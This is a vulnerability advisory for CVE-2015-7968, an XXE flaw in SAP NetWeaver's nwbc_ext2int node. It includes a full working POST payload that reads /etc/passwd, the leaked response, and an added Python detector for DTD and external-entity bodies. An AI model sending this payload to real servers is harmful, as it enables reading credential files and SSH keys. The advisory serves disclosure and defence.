CVE-2015-7968 - SAP Netweaver Application Server XXE (SAP Security Note 2183189)

1. Vulnerability Properties

Title: XML External Entities (XXE) / Local File Inclusion
CVE ID: CVE-2015-7968
CVSSv3 Base Score: 4.9 AV:N/AC:M/AU:S/C:P/I:N/A:P
Vendor: SAP
Products: SAP NetWeaver Application Server
Advisory Release Date: 12 January 2016
Advisory URL: https://labs.integrity.pt/advisories/cve-2015-7968
Credits: Discovery by Tiago Sintra <ts[at]integrity.pt>

2. Vulnerability Summary

SAP NetWeaver Application Server uses a module called nwbc_ext2int which is vulnerable to XXE attacks. According to the documentation, this node is used when data is to be displayed in a side panel. The node converts the external representation of UI elements to an internal representation.

3. Technical Details

The vulnerability can only be exploited after authentication. For this case study, it was possible to log in using the default TMSADM account, which seems to be available on various installations by default. Even though this account was not allowed access to most areas, it was possible to enumerate some of the running modules.

After authentication, we checked which of the default nodes were enabled and found that nwbc_ext2int responded with XML content. By posting the same XML as the page returned initially, it was possible to get the page to reflect the value in the FIELD_VALUE tag. Since we had a page that accepted XML and reflected our content, the chances of a successful XXE exploitation were good. And in fact, creating a POST request with a simple XXE header proved to be enough to exploit the vulnerability.

POST /sap/bc/ui2/nwbc/nwbc_ext2int/ HTTP/1.1
Host: vulnerablesite.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: <cookies>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 455

<?xml version="1.0" encoding="ISO-8859-1" standalone="no" ?>
<!DOCTYPE xxx [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<asx:abap version="1.0" xmlns:asx="http://www.sap.com/abapxml">
<asx:values>
<ITAB>
<item>
<PROGRAM_NAME>aaaa</PROGRAM_NAME>
<SCREEN_NUMBER>1</SCREEN_NUMBER>
<FIELD_NAME>A</FIELD_NAME>
<FIELD_VALUE>&file;</FIELD_VALUE>
</item>
</ITAB>
</asx:values>
</asx:abap>

Server responded with:

HTTP/1.1 200 OK
content-type: text/xml; charset=utf-8
Content-Length: 4921
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
expires: 0
server: SAP NetWeaver Application Server / ABAP 731

<?xml version="1.0" encoding="utf-8"?><asx:abap version="1.0"
xmlns:asx="http://www.sap.com/abapxml"><asx:values><ITAB><item><PROGRAM_NAME>aaaa</PROGRAM_NAME><SCREEN_NUMBER>1</SCREEN_NUMBER><FIELD_NAME>A</FIELD_NAME><FIELD_VALUE>root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
(...)
</FIELD_VALUE><DATA_ELEMENT/><CONVERSION_STATE/></item></ITAB></asx:values></asx:abap>

Since SAP is a Java based application, the XML parser used allowed us to read not only files but also directories. File access is restricted by the user context under which SAP runs. In our case, we got a low privileged user, but we could still successfully fetch many SAP configuration files and also the SSH private keys of that user from the /home directory. This could allow an attacker to connect directly to the target server through SSH and, from there, reach many other exploitable vectors.
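As an added example (not code from the advisory or from SAP), the check a defender would put in front of the nwbc_ext2int node or in a request-inspection rule: reject any asx:abap body that carries a DOCTYPE or an external entity declaration before it reaches the parser, and flag such requests for triage. The endpoint path, element names and the two request bodies are constructed from the request shown above; the function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies (not captured traffic): the asx:abap document the
# node accepts, once with the external entity declaration and once without.
PROLOG = b'<?xml version="1.0" encoding="ISO-8859-1" standalone="no" ?>\n'
DTD = b'<!DOCTYPE xxx [<!ENTITY file SYSTEM "file:///etc/passwd">]>\n'
ENVELOPE = (
    b'<asx:abap version="1.0" xmlns:asx="http://www.sap.com/abapxml">'
    b'<asx:values><ITAB><item><PROGRAM_NAME>aaaa</PROGRAM_NAME>'
    b'<SCREEN_NUMBER>1</SCREEN_NUMBER><FIELD_NAME>A</FIELD_NAME>'
    b'<FIELD_VALUE>%s</FIELD_VALUE></item></ITAB></asx:values></asx:abap>'
)
XXE_BODY = PROLOG + DTD + ENVELOPE % b"&file;"
SAFE_BODY = PROLOG + ENVELOPE % b"hello"

# A legitimate ext2int payload never needs a DTD, so any DOCTYPE is grounds to
# reject; the second pattern names the external (SYSTEM/PUBLIC) entity case.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


class UnsafeXml(ValueError):
    """Raised when a request body declares a DTD or external entity."""


def check_xml_prolog(body: bytes) -> list:
    """Return the reasons a body would be rejected (empty list = clean)."""
    reasons = []
    if DOCTYPE_RE.search(body):
        reasons.append("DOCTYPE declaration present")
    if EXT_ENTITY_RE.search(body):
        reasons.append("external entity (SYSTEM/PUBLIC) declared")
    return reasons


def parse_ext2int_items(body: bytes) -> list:
    """Refuse any DTD, then parse the <item> records the node reflects."""
    reasons = check_xml_prolog(body)
    if reasons:
        raise UnsafeXml("; ".join(reasons))
    root = ET.fromstring(body)
    return [{c.tag: (c.text or "") for c in item} for item in root.iter("item")]


def rejects(body: bytes) -> bool:
    """True if the hardened parser refuses this body."""
    try:
        parse_ext2int_items(body)
    except UnsafeXml:
        return True
    return False


def triage_requests(records: list) -> list:
    """Flag (path, reasons) for POSTs to nwbc_ext2int whose body carries a DTD."""
    flagged = []
    for rec in records:  # rec: {"path": ..., "body": ...}, constructed records
        reasons = check_xml_prolog(rec["body"])
        if "nwbc_ext2int" in rec["path"] and reasons:
            flagged.append((rec["path"], reasons))
    return flagged
```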

4. Vulnerable Versions

  • SAP NetWeaver Application Server / ABAP 731. Previous versions are probably affected as well.

5. Solution

  • SAP has released a patch for this issue. Check references.

6. Vulnerability Timeline

  • 13/06/2015 - Vulnerability reported to SAP
  • 22/07/2015 - Asked SAP for feedback
  • 23/07/2015 - SAP replied stating that the vulnerability was accepted and was not known at that point. SAP also states that a security note would be created for this case.
  • 28/07/2015 - Contacted Mitre requesting a CVE identifier
  • 07/09/2015 - SAP sends an email with the security note details and asks to hold the vulnerability details for the 3 month grace period
  • 23/10/2015 - Mitre replies with the CVE ID
  • 12/01/2016 - Advisory produced and released

7. References